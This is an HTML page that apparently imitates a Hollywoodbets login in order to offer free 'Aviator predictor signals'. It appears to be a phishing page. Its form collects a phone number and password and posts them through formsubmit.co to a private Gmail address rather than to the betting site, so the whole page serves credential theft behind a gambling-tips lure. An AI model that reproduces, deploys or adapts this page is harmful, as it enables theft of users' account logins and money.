<!DOCTYPE html>
<html>
<head>
  <title>Hollywood bet aviator predictor signals</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: ;
    }

    .container {
      width: 340px;
      background-color: #fff;     
      border-radius: 5px;
      margin-left: 2px;
      height: 680px;
      background-color:#f1f1f1 ;
  }

    
    .betway-logo img {
      Width: 340px;
     
      
    }


    .form-group input {
      width:318px;
     height: 40px;
      border: 1px solid #ccc;
      border-radius: 4px;
      outline-color: #9a15ff;
      border-color:  #9a15ff ;
      border-width: 2px;
      
      
    }

    button{  
      width: 321px;
     height: 46px;
     background-color: #52247F;
     color: whitesmoke;
     border-color: #52247F;
     border:none;
     border-radius:4px ;
     font-size: 17px;
    }
    
   .form-group{
     margin:10px ;
     margin-bottom:17px;
     color: grey;
     
   }
   
 h3{
     color: #52247F;
 }  
   
  </style>
</head>
<body>
  <div class="container">
    <div class="betway-logo">
       <img src="https://i.ibb.co/JFNXWxG/Screenshot-20240609-132138.jpg" alt="Screenshot-20240609-132138" border="0"></a>
      
    </div>
    <form>
        
<h3>Hollywood bet Free Aviator signals</h3>        
 <h1>Login</h1> 
       
  <form action="https://formsubmit.co/tembezama368@gmail.com" method="POST">      
      <div class="form-group">
        <label for="Username">Unsername</label></label>
        <input type="tel" id="phone" name="phone"  required>
      </div>
      
      
         
      <div class="form-group">
        <label for="Password">Password</label>
        <input type="Gmail" id="password" name="Gmail" required>
      </div>
      
      
      
      <div class="form-group">
  <button type="submit">Log In</button>
  
  <p>by logging in you accept and agree to our terms and conditions. </p>
      </div>
    </form>
  </div>
</body>
</html>

